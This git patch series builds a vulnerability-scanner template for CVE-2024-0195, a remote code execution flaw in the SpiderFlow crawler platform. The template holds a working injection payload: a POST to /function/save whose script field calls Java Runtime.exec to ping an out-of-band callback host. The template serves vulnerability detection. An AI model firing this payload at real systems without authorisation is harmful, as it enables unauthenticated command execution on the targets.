From 6964302bbde66b08699f9ea4f116a2c12f95816c Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 16:37:32 +0530 Subject: [PATCH 1/5] Create CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-0195.yaml diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml new file mode 100644 index 00000000000..cf2a26bb41f --- /dev/null +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-0195 + +info: + name: SpiderFlow Crawler Platform - Remote Code Execution + author: pussycat0x + severity: critical + description: | + A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. + reference: + - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md + - https://github.com/wy876/wiki + - https://github.com/xingchennb/POC- + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-0195 + cwe-id: CWE-94 + epss-score: 0.00107 + epss-percentile: 0.43408 + cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: ssssssss + product: spider-flow + fofa-query: app="SpiderFlow" + +http: + - raw: + - | + POST /function/save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + + id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B + + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" From 594c949fc01a1e4512cb03d7443f03e8c6edc8d1 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 16:51:12 +0530 Subject: [PATCH 2/5] Update CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index cf2a26bb41f..c8a0ee3d6b1 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -32,7 +32,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - + id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B matchers: From 81fe704a0e93d7f35164fac12638687bb02fb2c2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 23 May 2024 18:15:41 +0530 Subject: [PATCH 3/5] Update CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index c8a0ee3d6b1..42561d03f07 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -24,6 +24,7 @@ info: vendor: ssssssss product: spider-flow fofa-query: app="SpiderFlow" + tags: cve,cve2024,spiderflow http: - raw: From 3ae722960fff74d21ba443488dd5e8252537966c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 23 May 2024 18:19:04 +0530 Subject: [PATCH 4/5] Update CVE-2024-0195.yaml --- http/cves/2024/CVE-2024-0195.yaml | 23 ++++++++++++++++++----- 1 file changed, 18 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 42561d03f07..5da0534c4cb 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -8,15 +8,15 @@ info: A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability. reference: - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md - - https://github.com/wy876/wiki - - https://github.com/xingchennb/POC- + - https://vuldb.com/?id.249510 + - https://nvd.nist.gov/vuln/detail/CVE-2024-0195 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-0195 cwe-id: CWE-94 epss-score: 0.00107 - epss-percentile: 0.43408 + epss-percentile: 0.43423 cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* metadata: verified: true @@ -24,9 +24,22 @@ info: vendor: ssssssss product: spider-flow fofa-query: app="SpiderFlow" - tags: cve,cve2024,spiderflow + tags: cve,cve2024,spiderflow,crawler,unauth,rce + +flow: http(1) && http(2) http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'SPIDER_FLOW_VERSION' + - raw: - | POST /function/save HTTP/1.1 @@ -40,4 +53,4 @@ http: - type: word part: interactsh_protocol words: - - "dns" + - "http" From ef3e4afa7ad016d187700c25101aec1eb6f0e511 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 23 May 2024 18:20:05 +0530 Subject: [PATCH 5/5] dns update --- http/cves/2024/CVE-2024-0195.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 5da0534c4cb..c458ad3cd32 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -53,4 +53,4 @@ http: - type: word part: interactsh_protocol words: - - "http" + - "dns"